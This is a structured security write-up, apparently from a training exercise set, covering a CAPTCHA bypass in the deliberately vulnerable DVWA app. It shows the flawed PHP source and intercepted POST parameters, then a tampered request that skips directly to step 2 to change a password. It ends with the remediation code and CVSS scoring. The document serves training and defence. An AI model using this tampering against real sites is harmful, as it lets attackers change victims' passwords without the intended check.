## Version 1.4.1
## language: en

Feature:
  TOE:
    DVWA
  Location:
    http://localhost/dvwa/vulnerabilities/captcha - Step (Field)
  CWE:
    CWE-287: Improper Authentication
  Goal:
    Bypass a captcha authentication to change password
  Recommendation:
    Perform captcha validation in second authentication step

  Background:
  Hacker's software:
    | <Software name>    |    <Version>         |
    | Windows            | 10.0.16299 (x64)     |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
    | Burp Suite CE      | 1.7.36               |
  TOE information:
    Given I'm running DVWA on Windows
    And The url "http://localhost/dvwa/vulnerabilities/captcha/"
    And I'm accessing the DVWA through my browser

  Scenario: Normal use case
  The site allows the user to change DVWA password in two steps
    Given The access to the page dvwa/vulnerabilities/captcha/
    Then I type and re-type the password and confirmation
    And I check the captcha
    And I click the change button (First step)
    Then the website shows the message
    """
    You passed the CAPTCHA! Click the button to confirm your changes.
    """
    And I click change (Second step)
    Then the website shows the message
    """
    Password Changed.
    """

  Scenario: Static detection
  Two-step Authorization does not check captcha in second step
    Given the configuration file 'low.php' located at home: 'captcha/source'
    And the password change process being in two steps
    Then I check the 1st step and see the captcha validation at lines 12-15
    """
    03 if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    .
    .
    11  // Check CAPTCHA from 3rd party
    12  $resp = recaptcha_check_answer(
    13    $_DVWA[ 'recaptcha_private_key'],
    14    $_POST['g-recaptcha-response']
    15  );
    """
    And I check the 2nd step and I see there is no captcha validation inside
    """
    25  if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ){
    """

  Scenario: Dynamic detection
  Intercept process parameters
    Given the url "http://localhost/dvwa/vulnerabilities/captcha/"
    Then I use Burp Suite CE along Firefox to intercept for normal use case
    And I see the parameters posted for the 1st click step
    """
    step=1&password_new=admin&password_conf=admin
    &g-recaptcha-response=(415-char string)&Change=Change
    """
    Then I forward request and perform second step and intercept parameters
    """
    step=2&password_new=admin&password_conf=admin&Change=Change
    """
    And I notice the second step does not perform any validation on captcha

  Scenario: Exploitation
  Skip First step in authentication tampering parameters
    Given the url "http://localhost/dvwa/vulnerabilities/captcha/"
    Then I enter credentials click change without checking captcha
    And I use Burp to intercept the POST request parameters
    """
    step=1&password_new=admin&password_conf=admin&
    g-recaptcha-response=&Change=Change
    """
    Then I modify the parameters bypassing to step 2
    """
    step=2&password_new=admin&password_conf=admin&Change=Change
    """
    Then I Forward the modified request
    And I get the message
    """
    Password Changed.
    """

  Scenario: Remediation
  Perform captcha validation in second step or make the process in one step
    Given the configuration file 'low.php' located at home: 'captcha/source'
    Then within the IF condition for the second step add the code
    """
    $resp = recaptcha_check_answer(
      $_DVWA[ 'recaptcha_private_key'],
      $_POST['g-recaptcha-response']
    );
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.9/10 (Medium) - AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.8/10 (Medium) - E:U/RL:W/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (Medium) - CR:M/IR:M/AR:H

  Scenario: Correlations
  No correlations have been found to this date 2018-12-17
